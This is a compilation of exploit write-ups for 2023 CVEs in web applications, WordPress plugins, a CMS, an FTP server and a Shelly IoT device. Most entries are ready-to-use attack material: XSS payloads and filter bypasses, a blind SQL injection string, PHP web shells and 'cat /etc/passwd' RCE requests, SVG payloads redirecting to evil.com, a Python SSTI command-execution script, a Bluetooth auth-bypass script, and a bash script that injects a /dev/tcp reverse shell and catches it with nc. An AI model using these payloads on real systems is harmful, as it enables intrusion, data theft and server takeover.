ISHACK AI BOT

# Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: PHPJabbers # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/taxi-booking-script/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4116 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /index.php GET parameter 'index' is vulnerable to RXSS https://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS] [-] Done

# Exploit Title: Academy LMS 6.0 - Reflected XSS # Exploit Author: CraCkEr # Date: 22/07/2023 # Vendor: Creativeitem # Vendor Homepage: https://creativeitem.com/ # Software Link: https://demo.creativeitem.com/academy/ # Version: 6.0 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4119 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /academy/home/courses GET parameter 'query' is vulnerable to XSS https://website/academy/home/courses?query=[XSS] Path: /academy/home/courses GET parameter 'sort_by' is vulnerable to XSS https://website/academy/home/courses?category=web-design&price=all&level=all&language=all&rating=all&sort_by=[XSS] XSS Payloads (Blocked) : <script>alert(1)</script> ldt4d"><ScRiPt>alert(1)</ScRiPt>nuydd XSS Payload Bypass Filter : cplvz"><img src=a onerror=alert(1)>fk4ap [-] Done

# Exploit Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection # Exploit Author: CraCkEr # Date: 29/07/2023 # Vendor: adivaha - Travel Tech Company # Vendor Homepage: https://www.adivaha.com/ # Software Link: https://wordpress.org/plugins/adiaha-hotel/ # Demo: https://www.adivaha.com/demo/adivaha-online/ # Version: 2.3 # Tested on: Windows 10 Pro # Impact: Database Access ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /mobile-app/v3/ GET parameter 'pid' is vulnerable to SQL Injection https://website/mobile-app/v3/?pid=[SQLI]&isMobile=chatbot --- Parameter: pid (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: pid=77A89299'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&isMobile=chatbot --- [-] Done

#!/bin/bash # Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass # Google Dork: NA # Date: 2nd August 2023 # Exploit Author: The Security Team [exploitsecurity.io] # Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability # Vendor Homepage: https://www.shelly.com/ # Software Link: NA # Version: Firmware v0.11.0 (REQUIRED) # Tested on: MacOS/Linux # CVE : CVE-2023-33383 IFS= failed=$false RED="\e[31m" GREEN="\e[92m" WHITE="\e[97m" ENDCOLOR="\e[0m" substring="Connection refused" banner() { clear echo -e "${GREEN}[+]*********************************************************[+]" echo -e "${GREEN}| Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}] |" echo -e "${GREEN}| Description: Shelly PRO 4PM - Out of Bounds |" echo -e "${GREEN}| CVE: CVE-2023-33383 |" echo -e "${GREEN}[+]*********************************************************[+]" echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}" } banner read -s -n 1 key if [ "$key" = "x" ]; then exit 0; elif [ "$key" = "" ]; then gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary) if [ -z "$gattout" ]; then echo -e "${RED}Connection timed out${ENDCOLOR}" exit 0; else sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1 echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}" sleep 1 if [ $? -eq 1 ]; then $failed=$true exit 0; fi sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1 sleep 1 if [ $? -eq 1 ]; then $failed=$true echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}" exit 0; else sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1 sleep 1 for i in {1..5} do echo -ne "${GREEN}." sleep 1 done echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}" fi fi fi

# Exploit Title: Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload # Date: 3-8-2023 # Category: Web Application # Exploit Author: Rajdip Dey Sarkar # Version: 3.3 # Tested on: Windows/Kali # CVE: CVE-2023-39115 Description: ---------------- An arbitrary file upload vulnerability in Campcodes Online Matrimonial Website System Script v3.3 allows attackers to execute arbitrary code via uploading a crafted SVG file. SVG Payload ------------------ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("You have been hacked!!") window.location.href="https://evil.com" </script> </svg> Steps to reproduce -------------------------- -Login with your creds -Navigate to this directory - /profile-settings -Click on Gallery -> Add New Image -> Browser -> Add Files -Choose the SVG file and upload done -Click the image!! Payload Triggered Burp Request ------------------- POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E Content-Type: multipart/form-data; boundary=---------------------------167707198418121100152548123485 Content-Length: 1044 Origin: http://localhost Connection: close Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg; acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="relativePath" null -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="name" file (1).svg -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="type" image/svg+xml -----------------------------167707198418121100152548123485 Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("You have been hacked!!") window.location.href="https://evil.com" </script> </svg> -----------------------------167707198418121100152548123485--

# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access # Date: 03.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.myeventon.com/ # Version: 4.4 # Tested on: Google and Firefox latest version # CVE : CVE-2023-2796 # 1. Description The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id. # 2. Proof of Concept (PoC) Proof of Concept: https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value

# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR # Date: 03.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://www.myeventon.com/ # Version: 4.4 # Tested on: Google and Firefox latest version # CVE : CVE-2023-3219 # 1. Description The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post. # 2. Proof of Concept (PoC) Proof of Concept: https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>

Exploit Title: Webutler v3.2 - Remote Code Execution (RCE) Application: webutler Cms Version: v3.2 Bugs: RCE Technology: PHP Vendor URL: https://webutler.de/en Software Link: http://webutler.de/download/webutler_v3.2.zip Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to visit media 3.upload phar file 4. upload poc.phar file poc.phar file contents : <?php echo system("cat /etc/passwd");?> 5. Visit to poc.phar file poc request: POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1 Host: localhost Content-Length: 40 sec-ch-ua: sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 X_FILENAME: poc.phar sec-ch-ua-platform: "" Accept: */* Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/webutler_v3.2/admin/browser/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu Connection: close <?php echo system("cat /etc/passwd");?>

Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE) Application: webedition Cms Version: v2.9.8.8 Bugs: RCE Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1. Login account 2. Go to New -> Webedition page -> empty page 3. Select php 4. Set as "><?php echo system("cat /etc/passwd");?> Description area Poc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1 Host: localhost Content-Length: 1621 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300 Connection: close we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS Application: Webedition CMS Version: v2.9.8.8 Bugs: Stored Xss Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 03.08.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1. Login to account 2. Go to New -> Media -> Image 3. Upload malicious svg file svg file content: """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ Poc request: POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1 Host: localhost Content-Length: 761 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: iframe Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300 Connection: close we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

# Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS # Exploit Author: CraCkEr # Date: 29/07/2023 # Vendor: adivaha - Travel Tech Company # Vendor Homepage: https://www.adivaha.com/ # Software Link: https://wordpress.org/plugins/adiaha-hotel/ # Demo: https://www.adivaha.com/demo/adivaha-online/ # Version: 2.3 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /mobile-app/v3/ GET parameter 'isMobile' is vulnerable to XSS https://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS] XSS Payload: clq95"><script>alert(1)</script>lb1ra [-] Done

# Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution # Date: 2023-07-20 # Exploit Author: Mehmet Kelepçe # Vendor Homepage: https://wpmudev.com/project/forminator-pro/ # Software Link: https://wordpress.org/plugins/forminator/ # Version: 1.24.6 # Tested on: PHP - Mysql - Apache2 - Windows 11 HTTP Request and vulnerable parameter: ------------------------------------------------------------------------- POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 1756 sec-ch-ua: Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTmsFfkbegmAjomne X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wp-settings-time-1=1689794282; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR Connection: close . . . . . ------WebKitFormBoundaryTmsFfkbegmAjomne Content-Disposition: form-data; name="postdata-1-post-image"; filename="mehmet.php" Content-Type: application/octet-stream <?php $_GET['function']($_GET['cmd']); ?> Source Code: wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php: -------------------------------------------------------------------- public function has_upload() { $fields = $this->get_fields(); if ( ! empty( $fields ) ) { foreach ( $fields as $field ) { if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) { return true; } } } return false; } Vulnerable parameter: postdata-1-post-image and Source code: wp-content/plugins/forminator/library/fields/postdata.php: ------------------------------------------------------------------- if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) { if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty( $_FILES[ $image_field_name ]['name'] ) ) { $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] ); $valid = wp_check_filetype( $file_name ); if ( false === $valid['ext'] || ! in_array( $valid['ext'], $this->image_extensions ) ) { $this->validation_message[ $image_field_name ] = apply_filters( 'forminator_postdata_field_post_image_nr_validation_message', esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ), $id ); } } } Vulnerable function: $image_field_name ------------------------------------------------------------------------- Payload file: mehmet.php <?php $_GET['function']($_GET['cmd']); ?> -------------------------------------------------------------------------

# Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS) # Discovered by: Yehia Elghaly # Discovered Date: 2023-08-04 # Vendor Homepage: https://www.xlightftpd.com/ # Software Link : https://www.xlightftpd.com/download/setup.exe # Tested Version: 3.9.3.6 # Vulnerability Type: Buffer Overflow Local # Tested on OS: Windows XP Professional SP3 - Windows 11 x64 # Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC) # Steps to reproduce: # 1. - Download and Xlight FTP Server # 2. - Run the python script and it will create exploit.txt file. # 3. - Open Xlight FTP Server 3.9.3.6 # 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup # 6. - Execute a Program after use logged in- Paste the characters # 7 - Crashed #!/usr/bin/env python3 exploit = 'A' * 294 try: with open("exploit.txt","w") as file: file.write(exploit) print("POC is created") except: print("POC not created")

# Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure # Exploit Author: CraCkEr # Date: 25/07/2023 # Vendor: Templatecookie # Vendor Homepage: https://templatecookie.com/ # Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script # Version: 2.14.0 # Tested on: Windows 10 Pro # Impact: Sensitive Information Leakage # CVE: CVE-2023-4168 ## Description Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects. ## Steps to Reproduce: When you visit any page on the website, like: https://website/ad-list?category=electronics https://website/ad-list-search?page=2 https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword= in the body page response there's information leakage for +---------------------+ google_map_key api_key auth_domain project_id storage_bucket messaging_sender_id app_id measurement_id +---------------------+ Note: The same information leaked, such as the API keys, server keys, and app ID, was added to the "Firebase Push Notification Configuration" in the Administration Panel. Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path: https://website/push-notification (Login as Administrator) [-] Done

# Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS # Google Dork: NA # Date: 05/08/2023 # Exploit Author: Yehia Elghaly # Vendor Homepage: https://www.lucee.org/ # Software Link: https://download.lucee.org/ # Version: << 5.4.2.17 # Tested on: Windows 10 # CVE: N/A Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java. Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials. The payload: ?msg=<img src=xss onerror=alert('xssya')> http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E POST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1 Host: 172.16.110.130:8888 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 278 Origin: http://172.16.110.130:8888 Connection: close Referer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=create Cookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overview Upgrade-Insecure-Requests: 1 name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit [Affected Component] Debugging-->Template Service --> Search Services --> Event Gateway Service --> Logging

# Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated) # Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Date: 03/08/2023 # Vendor: https://pyrocms.com/ # Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation # Vulnerable Version(s): 3.9 # CVE: CVE-2023-29689 # Notes: You need a user who has access to /admin privilege # Example Usage: # First, run the script: python3 CVE-2023-29689.py # Please follow these steps: # 1. Enter the application URL: http://localhost:8000 # 2. Enter the email for authentication: [email protected] # 3. Enter the password: Admin@@2023 # 4. Enter the command to be executed: id # Result of command execution: # uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake) import requests from bs4 import BeautifulSoup from urllib.parse import urljoin def login(session, url, email, password): login_url = urljoin(url, '/admin/login') response = session.get(login_url) soup = BeautifulSoup(response.content, 'html.parser') token = soup.find('input', {'name': '_token'})['value'] payload = { '_token': token, 'email': email, 'password': password } session.post(login_url, data=payload) # Function to edit role 1 and extract the Description of the Admin user. def edit_role_and_extract_description(session, url, command): edit_role_url = urljoin(url, '/admin/users/roles/edit/1') response = session.get(edit_role_url) soup = BeautifulSoup(response.content, 'html.parser') token = soup.find('input', {'name': '_token'})['value'] payload = { '_token': token, 'name_en': 'Admin', 'slug': 'admin', 'description_en': f'{{{{["{command}"]|map("system")|join}}}}', 'action': 'save_exit' } session.post(edit_role_url, data=payload) # Extract the updated Description from role 1. response = session.get(urljoin(url, '/admin/users/roles')) soup = BeautifulSoup(response.content, 'html.parser') description = soup.find('td', {'data-title': 'Description'}).text.strip() return description def main(): url = input("Enter the application URL: ") email = input("Enter the email for authentication: ") password = input("Enter the password : ") command = input("Enter the command to be executed: ") with requests.Session() as session: login(session, url, email, password) description = edit_role_and_extract_description(session, url, command) print("\nResult of command execution:") print(description) if __name__ == "__main__": main()

# Exploit Title: Social-Commerce 3.1.6 - Reflected XSS # Exploit Author: CraCkEr # Date: 28/07/2023 # Vendor: mooSocial # Vendor Homepage: https://moosocial.com/ # Software Link: https://social-commerce.moosocial.com/ # Version: 3.1.6 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4174 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /search/index GET parameter 'q' is vulnerable to XSS https://website/search/index?q=[XSS] URL path folder [1,2] is vulnerable to XSS https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent https://website/user_info[XSS]/index/friends https://website/user_info/index[XSS]/friends https://website/faqs[XSS]/index?content_search= https://website/faqs/index[XSS]?content_search= XSS Payloads: j8chn"><img src=a onerror=alert(1)>ridxm [-] Done

# Exploit Title: mooSocial 3.1.8 - Reflected XSS # Exploit Author: CraCkEr # Date: 28/07/2023 # Vendor: mooSocial # Vendor Homepage: https://moosocial.com/ # Software Link: https://travel.moosocial.com/ # Version: 3.1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site # CVE: CVE-2023-4173 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials URL path folder is vulnerable to XSS https://website/classifieds[XSS]/search?category=1 https://website/classifieds/search[XSS]?category=1 XSS Payloads: ijz3y"><img src=a onerror=alert(1)>y4apk [-] Done

# Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF # Date: 05/08/2023 # Exploit Author: Hasan Ali YILDIR # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/vacation-rental-script/ # Version: 4.0 # Tested on: Windows 10 Pro ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Technical Detail / POC ========================== 1. Login Account 2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate) 3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21) [1] Cross-Site Request Forgery Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font> [2] Cross-Site Scripting (XSS) Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>

#!/bin/bash # Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection # Date: 03-08-2023 # Exploit Author: Shubham Pandey & thewhiteh4t # Vendor Homepage: https://www.esds.co.in/enlight360 # Version: 6.0.0 # Tested on: Kali Linux # CVE : CVE-2023-37569 URL=$1 LHOST=$2 LPORT=$3 echo "*****************************" echo "* ESDS eMagic 6.0.0 RCE *" echo "* > CVE-2023-37569 *" echo "* > Shubham & thewhiteh4t *" echo "*****************************" if [ $# -lt 3 ]; then echo """ USAGE : ./exploit.sh http://<IP> <LHOST> <LPORT> ./exploit.sh http://192.168.0.10 192.168.0.20 1337 """ exit 1 fi url="$1/index.php/monitor/operations/utilities/" echo "[+] URL : $URL" echo "[+] LHOST : $LHOST" echo "[+] LPORT : $LPORT" echo payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27" post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846" echo "[!] Triggering exploit..." echo $url (sleep 3; curl -s -X POST -d $post_data $url > /dev/null) & echo "[+] Catching shell..." nc -lvp 4444

